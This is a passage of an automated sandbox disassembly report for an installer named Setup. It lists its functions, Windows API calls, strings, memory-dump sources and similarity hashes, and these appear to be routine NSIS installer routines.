                                                                                                                                                                                                                                                                Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 004062D5: FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062D5: FindClose.KERNEL32(00000000), ref: 004062EC
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                • Opcode ID: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d138b8f9e5546ee40c5c7b94d2e402c7a6ef9e03f94093a7ede85926a053d7b8
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                                                                                                                                                                                                                                Function 00406224 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                • String ID: %02x%c$...
                                                                                                                                                                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                                                                                                                                                                                                                                Function 00405047 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405057
                                                                                                                                                                                                                                                                  • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                                                                                                                                                                                                                                Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1599320355-0
                                                                                                                                                                                                                                                                • Opcode ID: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65b4e2bc04cdfc761cbb664ad7f9fd0a470a6c6464aa2ef3bfae8e7c7ff5a66d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                                                                                                                                                                                                                                Function 004071F8 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                                                                                                                                                                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                                                                                                                • String ID: Version
                                                                                                                                                                                                                                                                • API String ID: 512980652-315105994
                                                                                                                                                                                                                                                                • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                                                                                                                                                                                                                                Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                                                                                                                • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                                                                                                                • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                                                                                                                                                                                                                                Function 00406365 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2883127279-0
                                                                                                                                                                                                                                                                • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                                                                                                                                                                                                                                Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                • String ID: !N~
                                                                                                                                                                                                                                                                • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                                                                                                                                                                                                                                Function 00405C3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 00405C48
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                                                                                                                                                                                                                                Function 004062A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                  • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2045164640.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                • Opcode ID: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                • Instruction ID: 8d95e7b1bd6a8fe250904a0927f32055e446839aab417a06e937ad69edd5bb19
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e77ee9ca870ff99cdb2782ad16b85c265d3824fde99dea76e58772afe0e1651
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04D05E34150316BACA009BA0DE09E997B64FBD0384F50442EF147C5070FA748001C70E
                                                                                                                                                                                                                                                                Function 00405DB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DC6
                                                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 00405DDE
                                                                                                                                                                                                                                                                • CharNextA.USER32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DEF
                                                                                                                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,00406BD3,00000000,[Rename]), ref: 00405DF8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2044944439.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044932928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044969117.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2044983166.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
